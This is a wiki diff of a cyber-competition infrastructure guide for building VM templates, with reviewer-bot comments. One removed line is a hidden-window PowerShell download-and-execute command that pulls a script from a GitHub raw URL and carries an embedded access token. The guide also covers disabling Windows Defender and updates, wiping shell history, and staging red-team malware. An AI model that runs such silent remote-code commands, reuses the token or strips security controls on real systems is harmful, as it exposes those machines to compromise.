Differences
This shows you the differences between two versions of the page.
guides:lockdown_black_team [2019/12/19 04:44] aibekzhy Swappiness |
guides:lockdown_black_team [2020/05/02 10:20] aibekzhy |
Line 18: | Line 18: | ||
- Copy Paste Enabled | - Copy Paste Enabled | ||
- Graphics to support Full HD/Automatic Graphics Detection | - Graphics to support Full HD/Automatic Graphics Detection | ||
+ | - Ensure time Synchronized | ||
+ | - Potentially disable DHCP | ||
+ | - Make sure the best NIC type is attached "vmxnet3" -> "vmxnet2" -> etc | ||
* Linux: | * Linux: | ||
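Review bot: the new "Potentially disable DHCP" and "Ensure time Synchronized" items in this hunk are too vague to act on: say which templates get a static address instead of DHCP (a template with DHCP disabled and no static address assigned is unreachable after deployment), and name the time source the templates should synchronize against so that clocks agree across every VM built from them. The NIC preference order "vmxnet3" -> "vmxnet2" -> etc is fine, but it would help to state that vmxnet3 is the expected default and the fallbacks are only for guests whose OS lacks the driver.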
Line 24: | Line 27: | ||
- SSH server (installed, enabled, running) | - SSH server (installed, enabled, running) | ||
- Decrease swappiness to 10 | - Decrease swappiness to 10 | ||
- | - Ubuntu specific: | + | - Python2 and python3 installed (less headache if you are using ansible) |
+ | - Ubuntu-specific: | ||
- Ensure networkd is a renderer | - Ensure networkd is a renderer | ||
+ | - Install resolvconf to configure DNS on 18.* | ||
- Fedora specific: | - Fedora specific: | ||
- Depending on implementation look into installing network-scripts | - Depending on implementation look into installing network-scripts | ||
- Install libselinux-python | - Install libselinux-python | ||
- Ensure Release of child OSes match supported OS: https://kb.vmware.com/s/article/1005870 | - Ensure Release of child OSes match supported OS: https://kb.vmware.com/s/article/1005870 | ||
+ | |||
+ | |||
* Windows: | * Windows: | ||
- VMWare tools | - VMWare tools | ||
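Review bot: two style problems in this hunk: the Ubuntu heading was changed to "Ubuntu-specific" but the Fedora heading two lines below still reads "Fedora specific", and the two empty lines added after the VMware KB link are stray whitespace. The "Install resolvconf to configure DNS on 18.*" item should name the release explicitly ("Ubuntu 18.04") rather than a wildcard, and the new "Python2 and python3 installed" item should say which interpreter the Ansible version in use actually requires, so the template does not carry one nobody needs.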
Line 37: | Line 44: | ||
- Ensure that Windows Remote Management service is started Automatically | - Ensure that Windows Remote Management service is started Automatically | ||
- Enable Ping via Firewall (Allow ICMP Packets) | - Enable Ping via Firewall (Allow ICMP Packets) | ||
- | - Disable Windows Defender (Registry/GPO) | + | - Disable/Uninstall Windows Defender (Registry/GPO) |
- Disable Windows Updates (Registry/GPO/Services) | - Disable Windows Updates (Registry/GPO/Services) | ||
- Ensure Sleep is disabled | - Ensure Sleep is disabled | ||
- | - Try to Debloat as much as possible: https://github.com/Sycnex/Windows10Debloater | + | - Try to Debloat as much as possible: https://github.com/Sycnex/Windows10Debloater (Might not worth it) |
+ | - Sometimes windows may start randomly shutting down. In which case please look into the following | ||
+ | - Use High-performance Battery Profile | ||
+ | - Windows 10 Enterprise specific: | ||
+ | - Make sure when Template is deployed, it has an Ethernet Access. If it doesn't have one, it will reboot endlessly: https://superuser.com/questions/933754/why-does-windows-10-shut-down-hourly-with-initiated-power-off-on-behalf-of-nt-a | ||
* Pfsense: | * Pfsense: | ||
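Review bot: "Disable/Uninstall Windows Defender (Registry/GPO)" now lists two different actions with different consequences for the competition environment; pick one and record the exact registry path or GPO setting used so the templates are reproducible. Wording fixes in the same hunk: "Use High-performance Battery Profile" should read "High performance power plan" (the Windows name for it), "(Might not worth it)" should be "(might not be worth it)", and the shutdown bullet is a sentence fragment ("In which case please look into the following"). The Ethernet-access item under Windows 10 Enterprise is worth stating as a check rather than a warning: verify network connectivity on the first boot of a deployed template before anything else in this list, since the endless reboot is the symptom.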
Line 51: | Line 63: | ||
* Ensure you clean up the history of all applications/shells | * Ensure you clean up the history of all applications/shells | ||
* Ensure you take a snapshot of the entire infrastructure after deploying your malware | * Ensure you take a snapshot of the entire infrastructure after deploying your malware | ||
+ | * Manually login to every VM after the red team is done pre-staging. This ensures that everything is still operational, and in addition, it loads a lot of things from disk to memory, which ensures a smoother experience at the start of the competition. | ||
+ | * If the performance of VMs is very slow, try to remove any snapshot that you may need to remove. | ||
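Review bot: the new "remove any snapshot that you may need to remove" item is circular and, read literally, contradicts the line above it that says to snapshot the whole infrastructure after the red team deploys its malware. Suggest: "If VM performance is very slow, consolidate or delete snapshots that are no longer needed, but keep the post-staging snapshot, since it is the rollback point." Also "Manually login to every VM" should be "Manually log in to every VM".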
Line 66: | Line 80: | ||
Things that are typically requested: | Things that are typically requested: | ||
- | * Windows: Dotnet (powershell.exe -Sta -Nop -w hidden -Command "IEX(IWR 'https://raw.githubusercontent.com/NotoriousRebel/temppp/master/builder.ps1?token=AIVA5C62REQKCZAXPVLPOUS5TAWXC' -UseBasicParsing)") | + | * Windows: |
+ | * Dotnet https://dotnet.microsoft.com/download | ||
+ | * Python executables | ||
* C2 Servers | * C2 Servers | ||
+ | * | ||
===== Naming Conventions ===== | ===== Naming Conventions ===== | ||
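Review bot: removing the old Windows line is the right call: it was a hidden-window PowerShell download-and-execute (IEX over IWR) of a script from a personal GitHub raw URL, with a GitHub access token embedded in the query string, which a template build guide should not instruct. Treat that token as exposed and revoke it, because the removed line stays readable in the page history, as this diff shows. Two follow-ups for the replacement items: "Python executables" should say which Python version and from where so builds are consistent, and the empty "*" bullet left under "C2 Servers" is a stray list item.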